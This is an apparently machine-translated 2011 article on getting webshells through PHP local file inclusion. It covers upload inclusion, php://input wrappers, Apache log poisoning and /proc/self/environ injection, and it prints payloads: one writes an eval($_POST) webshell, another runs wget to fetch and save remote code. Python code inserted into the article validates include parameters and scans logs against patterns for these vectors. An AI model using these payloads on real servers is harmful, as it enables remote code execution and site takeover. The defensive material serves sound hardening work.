PHP Security: A Roundup of GetShell Methods for LFI Vulnerabilities - Vulnerability Alert - Black Bar Safety Net

ID MYHACK58:62201132008
Type myhack58
Reporter 佚名
Modified 2011-10-04T00:00:00



0x00 Digression

Many friends are not very familiar with PHP LFI (Local File Include, local file inclusion) vulnerabilities. In fact there is a lot of material on this online, in particular a foreign paper. Although much of that material is not very detailed, and most people are too lazy to test it, this article gives you a summary and the complete exploitation methods.

0x01 LFI GetShell ideas

Before explaining how to use LFI to get a webshell, I must remind everyone that the truncation bug was fixed in PHP 5.3.4, so it is not surprising that in some cases exploitation fails.

1. Including an uploaded file

As long as the target server supports uploads, any file type will do (jpg, txt, gif, etc.) provided it contains a one-line Trojan (one-line webshell). This method is very simple and needs no further explanation.

2. Including the data:// or php://input pseudo-protocols

The prerequisite for this method is allow_url_include=On in php.ini; in addition the php://filter pseudo-protocol must be supported. Let us try a case like this, assuming there is a file containing the following vulnerable code:

<?php
// Vulnerable include: the value of ?p= reaches include() unchecked.
$query = $_GET['p'];
include($query);
?>
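As an added example that is not part of the original article: the following Python function shows the validation a hardened version of the include above should perform before the value of p ever reaches include(). The base directory, the page names and the function names are assumptions for illustration; the checks cover the vectors discussed in this article (NUL-byte truncation before PHP 5.3.4, the php:// and data: wrappers, and traversal to log files or /proc/self/environ).

```python
import posixpath
from urllib.parse import urlsplit

# Assumed application layout: one include file per allowlisted page name.
BASE_DIR = "/var/www/app/pages"
ALLOWED_PAGES = frozenset({"home", "about", "contact"})


class IncludeRejected(ValueError):
    """Raised when the ?p= value must never reach include()."""


def resolve_include(param, base_dir=BASE_DIR, allowed=ALLOWED_PAGES):
    """Map an untrusted ?p= value to a concrete file path or raise.

    The checks are the ones a hardened include() call site should do, in order:
    1. reject NUL bytes (the pre-PHP-5.3.4 truncation trick);
    2. reject anything with a scheme, which covers php://input, php://filter,
       data:, file:// and remote URLs;
    3. reject path separators and '..' so log files and /proc/self/environ
       cannot be reached;
    4. accept only names on a fixed allowlist;
    5. re-check that the resolved path is still below base_dir.
    """
    if not param or "\x00" in param:
        raise IncludeRejected("empty name or NUL byte")
    if urlsplit(param).scheme:
        raise IncludeRejected("stream wrapper or URL scheme")
    if "/" in param or "\\" in param or ".." in param:
        raise IncludeRejected("path separator or traversal")
    if param not in allowed:
        raise IncludeRejected("not on allowlist")
    path = posixpath.normpath(posixpath.join(base_dir, param + ".php"))
    if posixpath.commonpath([base_dir, path]) != base_dir:
        raise IncludeRejected("resolved path escapes base directory")
    return path


def reason_for(param):
    """Return None if param is accepted, otherwise the rejection reason."""
    try:
        resolve_include(param)
    except IncludeRejected as exc:
        return str(exc)
    return None


if __name__ == "__main__":
    # Constructed inputs covering the vectors discussed in the article.
    for candidate in ["home", "php://input", "data://text/plain,hi",
                      "../../apache/www_error.log", "/proc/self/environ",
                      "about\x00.jpg", "upload"]:
        print(repr(candidate), "->", reason_for(candidate) or "accepted")
```

The allowlist is the real control; the scheme and separator checks are kept in front of it so that a log entry shows which vector was attempted, and the final commonpath check guards against a future edit that relaxes the earlier ones.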

With allow_url_include=On this would be remote file inclusion; here we assume it is off, so only local inclusion is possible. So how do we exploit it? This is where the PHP input/output wrappers come in to obtain a webshell. I wrote up an exploit program, shown in Figure 01:

[Figure 01: the exploit program]

This exploit works on PHP 5.0 and below; the test on 5.3 fails; the rest you can verify yourselves. It is still fairly useless, but it is a good idea nonetheless.

3. Including log files

Log inclusion is still fairly practical; the logs of Apache and other servers are generally quite large. Why can we get a webshell from logs? Take Apache: when we visit a page of a website, including an error page, the server records the requested address, so if we put malicious code in the request it ends up in the log file. We generally use the following steps. First, visit a page that does not exist, carrying the malicious code, for example this evil code:

<?php fputs(fopen("/www/shell.php", "w+"), '<?php eval($_POST[a]);?>'); ?>

It is URL-encoded and then requested as <> (with the evil code). This page certainly does not exist, so the error log will contain a line with it. Next we include this log: <>=...pache/www_error.log. The Apache path has to be guessed by yourself; I am only giving an example here. Accessing it generates the shell.

4. Including /proc/self/environ

This one relies on the Linux environment variables. Many times this method does not work, because there is no access to /proc/self/environ. Just like reading /etc/passwd, if you can access /proc/self/environ, as in Figure 02:


[Figure 02: contents of /proc/self/environ]

Seeing this output, you understand why we use this Linux environment-variable file: it records the web session information of the user accessing the site, including the user-agent parameter, which is the name of your browser. This parameter can be modified on our client side. For the LFI code above, we can use: <> If you can get content similar to that shown in the figure above (that is, you have the permission), you can use the following method to get a webshell; I will give two methods. Method one: the Firefox plugin User Agent Switcher. Its use is simple and convenient. First we construct our own evil code:

<?php system('wget <> -O shell.php'); ?>
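As an added example, not from the original article: a small Python detector that scans Apache combined-format access log lines for the poisoning steps described in sections 3 and 4 (PHP code in a requested path or in the User-Agent header, an include parameter pointing at a log file or /proc/self/environ, and php:// or data: wrappers). The log lines are constructed samples using RFC 5737 test addresses; the parameter name p, the log path and the indicator names are assumptions.

```python
import re
from urllib.parse import unquote

# Apache "combined" log format. The sample lines below are constructed to
# match it; a real deployment would read the server's own access log.
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" '
    r'"(?P<ua>(?:[^"\\]|\\.)*)"$'
)

# Indicators for the poisoning vectors in the article. The names are our own.
PHP_CODE = re.compile(
    r"<\?(?:php\b|=)?|\b(?:eval|system|passthru|shell_exec|exec|assert)\s*\(",
    re.IGNORECASE)
WRAPPER = re.compile(r"\b(?:php|data|expect|phar|zip)://|\bdata:", re.IGNORECASE)
LFI_TARGET = re.compile(
    r"\.\./|\.\.\\|/proc/self/environ|/var/log/|/etc/passwd|\.log\b",
    re.IGNORECASE)


def decode(value, rounds=3):
    """URL-decode repeatedly (bounded) so double-encoded payloads are seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def analyse_request(path, user_agent=""):
    """Return the sorted indicator names found in one request."""
    findings = set()
    path, user_agent = decode(path), decode(user_agent)
    if PHP_CODE.search(path):
        findings.add("php_code_in_path")
    if PHP_CODE.search(user_agent):
        findings.add("php_code_in_user_agent")
    if WRAPPER.search(path):
        findings.add("stream_wrapper_in_request")
    if LFI_TARGET.search(path):
        findings.add("lfi_target_in_request")
    return sorted(findings)


def scan_log(lines):
    """Return (line_number, client_ip, findings) for every suspicious line."""
    alerts = []
    for number, line in enumerate(lines, 1):
        match = COMBINED.match(line.rstrip("\n"))
        if not match:
            continue  # not combined format; a real tool would report this
        findings = analyse_request(match["path"], match["ua"])
        if findings:
            alerts.append((number, match["ip"], findings))
    return alerts


# Constructed sample log: one benign request, then the article's vectors.
SAMPLE_LOG = [
    '203.0.113.7 - - [04/Oct/2011:10:00:01 +0000] "GET /index.php?p=home HTTP/1.1" 200 1532 "-" "Mozilla/5.0"',
    # section 3, step 1: PHP tags in a non-existent path (lands in the log)
    '198.51.100.9 - - [04/Oct/2011:10:00:05 +0000] "GET /%3C%3Fphp%20echo%201%3B%3F%3E HTTP/1.1" 404 210 "-" "Mozilla/5.0"',
    # section 3, step 2: the include parameter pointed at the log file
    '198.51.100.9 - - [04/Oct/2011:10:00:09 +0000] "GET /index.php?p=../../../../var/log/apache2/error.log HTTP/1.1" 200 88412 "-" "Mozilla/5.0"',
    # section 4: PHP tags in User-Agent plus an include of /proc/self/environ
    '198.51.100.9 - - [04/Oct/2011:10:00:12 +0000] "GET /index.php?p=../../../../proc/self/environ HTTP/1.1" 200 1190 "-" "<?php echo 1; ?>"',
    # section 2: the php://input wrapper
    '198.51.100.9 - - [04/Oct/2011:10:00:15 +0000] "POST /index.php?p=php://input HTTP/1.1" 200 95 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for number, ip, findings in scan_log(SAMPLE_LOG):
        print(f"line {number} from {ip}: {', '.join(findings)}")
```

The detector flags the poisoning step itself (the 404 request carrying PHP tags) as well as the later include of the log or of /proc/self/environ, so a single request from the same client that trips both in sequence is a strong signal even when the include itself returned 200.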
